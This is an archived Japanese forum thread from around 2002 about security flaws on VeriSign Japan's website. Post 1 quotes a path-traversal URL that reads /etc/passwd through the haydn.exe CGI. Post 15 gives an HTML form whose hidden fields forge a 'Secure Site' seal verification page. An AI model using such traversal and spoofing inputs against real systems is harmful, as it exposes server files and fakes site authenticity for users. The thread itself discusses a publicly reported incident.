ベリサインの Secure Site シールが404 Not Found!
■ このスレッドは過去ログ倉庫に格納されています
0001名無しさん@お腹いっぱい。
NGNG日本ベリサインのWebに重大な問題が! ファイルが丸見えに(Scan)
大手認証ベンダである日本ベリサインのWebサイトに、重大な問題点が発見された。今回発見された問題点は、以下のようなURLへのアクセスが可能であり、ファイルが閲覧できてしまうというもの。
ttps://www.verisign.co.jp/cgi-bin/haydn.exe?VHTML_FILE=../../../../../../etc/passwd
しかし、幸いなことに編集部より同社へと通告してから、わずか20分程度で同社より返事をもらうことができた。それによると、「問題を認識し、既にサーバを停止しした。
まだ停止中だなゴルァ
ジャパネ銀行の下んとこのシール、クリックしてみれ
http://www.japannetbank.co.jp/
404 - File not found
お探しのファイルは、このサーバ内にありません。
リンク切れの場合、弊社ウェブマスターまで、ご連絡下さい。
日本ベリサイン株式会社
オンラインマーケティング担当
0002名無しさん@お腹いっぱい。
NGNG0003名無しさん@お腹いっぱい。
NGNG年間8万?か・・・・ボロい商売だ。
Yahooが対応の早さ云々言うのには、もっと呆れるが。
0004名無しさん@お腹いっぱい。
NGNG0005404は解消した
NGNG現在、サーバ証明書の情報を提供するサービスを一時停止しております。
大変ご迷惑をおかけいたしますが、ご理解くださいますようお願い申し上げます。
なお、当該サーバのSSL通信の機能には全く影響はございません。
日本ベリサイン株式会社
0006名無しさん@お腹いっぱい。
NGNGYahooが対策云々ってあんた、
この記事Scanからそのままもらってるだけだから
Yahooは無関係だろうに(呆)
0008名無しさん@お腹いっぱい。
NGNG0010名無しさん@お腹いっぱい。
NGNGこんなのまともな技術者が一人徹夜するだけで作り直せるだろうに。
001110
NGNG0012名無しさん@お腹いっぱい。
NGNGhttp://www.verisign.co.jp/press/alert/security_alertert20020308.html
0013名無しさん@お腹いっぱい。
NGNGトピ主さんがハッカーじゃないの?!(笑)
でも詳しいですね。
0014バカボンマンセー
NGNGhttps://www.netsecurity.ne.jp/article/1/4279.html
このシールと認証を利用するには、日本ベリサイン社に申込み、認証を受けなければならないのであるが、存在しない web でもあたかも認証を受けた web であるかのように偽装することが可能であった。
簡単なHTMLファイルをひとつ作るだけでベリサイン社のwebで「Secure Site」であるという表示を行うことができたのである。
偽装のサンプル
http://www.vagabond.co.jp/top/image/verisign02.GIF
0015たぶんこんな感じだったのだろう
NGNG<INPUT type=hidden name="VHTML_FILE" value="../htmldocs/query/authCertDisplay.htm">
<INPUT type=hidden name="form_file" value="../fdf/authCertByIssuer.fdf">
<INPUT type=hidden name="VS_STATUS" value="Valid Valider! Validest!!">
<INPUT type=hidden name="VS_VALID_START" value="30-MAY-1999">
<INPUT type=hidden name="VS_VALID_END" value="31-DEC-2019">
<INPUT type=hidden name="VS_PRODUCT_NAME" value="Digital ID Class 99 - Affiliate Global Server AuthCenter">
<INPUT type=hidden name="VS_ORGANIZATION" value="pc.2ch.net">
<INPUT type=hidden name="VS_COMMON_NAME" value="PC.2CH.NET">
<INPUT type=hidden name="VS_SUBJECT_READABLE" value="Country = JP<BR>
State = Tokyo<BR>Locality = Kitaku<BR>
Organizational Unit = Terms of use at www.verisign.co.jp/RPA (c)00<BR>
Organizational Unit = Authenticated by VeriSign Japan K.K.<BR>
Organizational Unit = Member, VeriSign Trust Network<BR>
Organization = ネットワークセキュリティ@2ch掲示板<BR>
Organizational Unit = (・∀・)<BR>
Common Name = pc.2ch.net/sec/">
</FORM>
<A HREF="javascript:document.form1.submit()">
<IMG SRC="http://www.verisign.co.jp/images/siteseal/VeriSignSeal.gif"></A>
0016名無しさん@お腹いっぱい。
NGNGhttp://www.verisign.co.jp/press/alert/security_alertert20020308.html
また、”haydn.exe”というのは、VHTML_FILE で選んだ HTML をテンプレートにして、データを差し込んで表示するCGIであると推測される。
っての読んで、漏れも怪しいと思てたーよ。
0017名無しさん@お腹いっぱい。
NGNGhttps://www.verisign.co.jp/secure/Seal.cgi?7a2431dc74d37e58235cc2605c3044ca
http://www.verisign.co.jp/press/alert/security_announce20020309.html
本サービスを提供する弊社システムの一部に不具合が発見されたため、本サービスを一時停止しておりました。その後、サービスを再開しましたが、現在、再度停止しております。
0019名無しさん@お腹いっぱい。
NGNGhttp://www.google.com/search?q=cache:e6TN-E8ukQcC:www.eurotrust.dk/manuals/Reference.pdf+haydn.exe
OnSite ってなに?
0020名無しさん@お腹いっぱい。
NGNGhttp://www.verisign.co.jp/query/srv_Xdisplay.html
0021名無しさん@お腹いっぱい。
NGNG0022名無しさん@お腹いっぱい。
NGNG0023名無しさん@お腹いっぱい。
NGNGVeriSign Secure Site です。
お互い顔の見えないインターネットで、個人情報、クレジットカード番号など大切な情報をECサイトに渡す時に気掛かりなのがウェブサイトの実在性とプライバシーです。
「今 僕が見ているホームページのURLは 本当に $$VS_COMMON_NAME$$ なの?」
「私のパスワードやプライバシーが、ネット上で盗み見されないか不安なんだけど…。」
あなたが訪れたウェブサイトと以下の情報を見比べてみてください。
サーバ名
( コモンネーム) $$VS_COMMON_NAME$$
ステータス $$VS_STATUS$$
有効期間(GMT) $$VS_VALID_START$$ - $$VS_VALID_END$$
証明書のクラス $$VS_PRODUCT_NAME$$
サブジェクト $$VS_SUBJECT_READABLE$$
上記の表で、あなたが訪れたウェブサイトとサーバ名(コモンネーム)が一致して、ステータスがValid(有効)となっていれば、ベリサイン・サーバID(ウェブサーバ用証明書)によって該当ページが認証されていることを確認できます。
0024名無しさん@お腹いっぱい。
NGNG0025名無しさん@お腹いっぱい。
NGNG素人の間では詳細と関係なしに
「べりサインは危ない」
っつー単純な言葉だけが一人歩きするぞ。
0026p
NGNG|@-@|
t H / < ピザお届けにあがりました〜
ほめぱげにもいけん
なにやっとるんだこのかいしゃ
0028名無しさん@お腹いっぱい。
NGNGつーか、これまでに起こした何件ものセキュリティーの問題で、
すでに「日本ベリサイン」は糞だということは明らかでしょう。
どうにかしろよ。> VeriSign
0029匿名
NGNG0030名無しさん@お腹いっぱい。
NGNG普通のスキルだよ。
003128
NGNGふつーのエンジニアです。
日本ベリサインが偏差値30ぐらいなだけです。
0032匿名
NGNG皆さんはどうしてこんなにベリサインのことをこき下ろすのですか?
ベリサインに入社したいのですか?
なんとなくおもしろいから。
ベリサインに入社は別にしたいとは思わない。
だって今日まで聞いたことなかった会社名だし。ごめん、無知で。
003428
NGNGこき下ろしているのは「日本ベリサイン」で、VeriSignじゃないよ。
ベリサインって何する会社だか分かってる?
鍵屋さんが戸締りできてなくってどうするのさ。
0035名無しさん@お腹いっぱい。
NGNGネットワークのセキュリティと
ネットワーク上を流れるデータのセキュリティと区別はついてる??
あまり無知な知識でえらそうに言わないように
003628
NGNG日本ベリサインはPKI屋さんだからサーバーのセキュリティーは関係ないってこと?
0037名無しさん@お腹いっぱい。
NGNGしかも、ニセの鍵を作れるマスターキーを保管している鍵やなんで、
戸締まりできてなかったってのは、かなりヤバイ。
0038名無しさん@お腹いっぱい。
NGNGおまえ、ヴァカ?
SSL の役割が暗号化だけだって勘違いしてネーか?
0039名無しさん@お腹いっぱい。
NGNG知ったか君はDKするよ
0040匿名
NGNG結局、鍵やがスペアキーの保管場所に鍵をかけ忘れてたってことなのですか?
0041名無しさん@お腹いっぱい。
NGNGそこまでは...。
「鍵屋の窓がサランラップ製だった」ぐらいですかね。
0042匿名
NGNG治ってるだれかまた壊さないの?!
0043名無しさん@お腹いっぱい。
NGNG0044名無しさん@お腹いっぱい。
NGNG004528
NGNGちなみにまたNetSecurityに書かれているよ。(藁
ttps://www.netsecurity.ne.jp/article/1/4376.html
0046名無しさん@お腹いっぱい。
NGNGhttp://memo.st.ryukoku.ac.jp/archive/200203.month/3236.html
004728
NGNGttp://www.verisign.co.jp/press/alert/security_announce20020313.html
リンク切られて直じゃないと見られなくなっちゃったね。
都合の悪い情報は隠蔽ですか。
こんな企業信用できないぜ。
■ このスレッドは過去ログ倉庫に格納されています